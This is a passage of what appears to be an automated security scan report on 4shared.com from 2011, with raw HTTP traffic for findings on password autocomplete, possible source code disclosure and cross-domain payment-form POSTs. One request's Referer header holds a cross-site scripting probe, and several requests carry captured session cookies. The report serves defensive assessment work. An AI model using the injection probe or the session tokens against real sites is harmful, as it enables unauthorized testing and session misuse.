Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
<br />
<form name="loginForm" action="/enter.jsp" method="post" class="openid">
<input type="hidden" name="afp" value=""/>
...[SNIP]...
<td class="alignLeft">
<input id="passfield" name="password" type="password"
class="fieldhint"
value="********"
style="width:210px" onfocus="clearPassword();" onblur="showPassword();"/>

<div class="capsWarning small red" style="display: none; width:210px">
...[SNIP]...

7.5. http://www.4shared.com/login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /login.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: fp=4sess_p50722b1a_t20110729-145755_; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 27078
Date: Fri, 29 Jul 2011 13:57:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login</title>
<met
...[SNIP]...
<br />
<form name="theForm" action="/index.jsp" method="post" class="openid">
<input type="hidden" name="afp" value=""/>
...[SNIP]...
<td>
<input type="password" name="password" id="passfield" class="field" style="width:250px" value="" onkeydown="if (event.keyCode==13){document.theForm.submit();}"/>
<div class="capsWarning small red" style="display: none;width:250px">
...[SNIP]...

7.6. http://www.4shared.com/signup.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signup.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /signup.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: ppVisited=%2Fsignup.jsp; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947872791; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 23864
Date: Fri, 29 Jul 2011 13:57:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; ch
...[SNIP]...
</center>


<form name="theForm" class="openid" action="https://www.4shared.com/signup.jsp" method="post" onsubmit="return checkForm(document.theForm)">
<input type="hidden" name="afu" value=""/>
...[SNIP]...
<td><input type="password" name="password" class="regfield"></td>
...[SNIP]...
<td><input type="password" name="password2" class="regfield"></td>
...[SNIP]...

8. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.4shared.com
Path:   /sla.jsp

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /sla.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 24527
Date: Fri, 29 Jul 2011 14:08:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Service Lev
...[SNIP]...
<a href="mailto:<%=ServerFacade.getSupportEmail()%>">
...[SNIP]...

9. Cross-domain POST  previous  next
There are 9 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


9.1. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.plimus.com. The form contains the following fields:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
<hr />
<form name="paymentForm3m" action="https://www.plimus.com/jsp/buynow.jsp?contractId=2268548&email=&language=ENGLISH&language=ENGLISH" method="POST" class="buyForm">
<div class="btn" onclick="return submitSelectedPurchase('3m');">
...[SNIP]...

9.2. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
</form>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post" name="paypalForm_p107m12">
<input type="hidden" name="cmd" value="_xclick">
...[SNIP]...

9.3. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.plimus.com. The form contains the following fields:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
<hr />
<form name="paymentForm6m" action="https://www.plimus.com/jsp/buynow.jsp?contractId=2268550&email=&language=ENGLISH&language=ENGLISH" method="POST" class="buyForm">
<div class="btn" onclick="return submitSelectedPurchase('6m');">
...[SNIP]...

9.4. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.plimus.com. The form contains the following fields:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
<hr />
<form name="paymentForm1m" action="https://www.plimus.com/jsp/buynow.jsp?contractId=2268546&email=&language=ENGLISH&language=ENGLISH" method="POST" class="buyForm">
<div class="btn" onclick="return submitSelectedPurchase('1m');">
...[SNIP]...

9.5. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
</form>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post" name="paypalForm_p107m3">

<input type="hidden" name="cmd" value="_xclick-subscriptions">
...[SNIP]...

9.6. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
</form>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post" name="paypalForm_p107m6">

<input type="hidden" name="cmd" value="_xclick-subscriptions">
...[SNIP]...

9.7. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
</form>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post" name="paypalForm_p107m1">

<input type="hidden" name="cmd" value="_xclick-subscriptions">
...[SNIP]...

9.8. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
</form>

<form action="https://www.paypal.com/cgi-bin/webscr" method="post" name="paypalForm_p107d5">
<input type="hidden" name="cmd" value="_xclick">
...[SNIP]...

9.9. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.plimus.com. The form contains the following fields:

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
